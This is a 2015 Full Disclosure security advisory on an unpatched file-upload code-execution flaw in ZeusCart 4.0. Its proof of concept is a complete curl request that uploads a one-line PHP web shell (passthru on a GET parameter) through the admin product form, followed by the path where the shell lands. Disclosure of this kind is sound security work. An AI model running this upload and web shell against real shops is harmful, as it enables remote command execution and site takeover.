ZeusCart 4.0: Code Execution Security Advisory – Curesec Research Team 1. Introduction
Affected Product: ZeusCart 4.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: supp...@zeuscart.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 09/14/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description It is possible to upload PHP files when uploading an image for a new product. This leads to code execution once an attacker has gained access to the backend via SQL Injection, CSRF, or XSS. Please note that an admin account with the right to add products is needed. 3. Proof of Concept curl -i -s -k -X 'POST' \ -H 'Content-Type: multipart/form-data; boundary=--------1849257448' \ -b 'PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \ --data-binary $'----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a18\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a22\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"product_title\"\x0d\x0a\x0d\x0atest\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"desc\"\x0d\x0a\x0d\x0adesc\x0d \x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"sku\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"txtweight\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"ufile[0]\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php \x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"price\"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"msrp_org\"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"soh\"\x0d\x0a\x0d\x0a7\x0d\x0a----------1849257448--\x0d\x0a' \ 'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert' The image will be located here: http://localhost/zeuscart-master/images/products/YYYY-MM-DDHHMMSStest.php 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 08/13/2015 Informed Vendor about Issue (no reply) 09/07/2015 Reminded Vendor of release date (no reply) 09/14/2015 Disclosed to public 6. Blog Reference: http://blog.curesec.com/article/blog/ZeusCart-40-Code-Execution-57.html _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/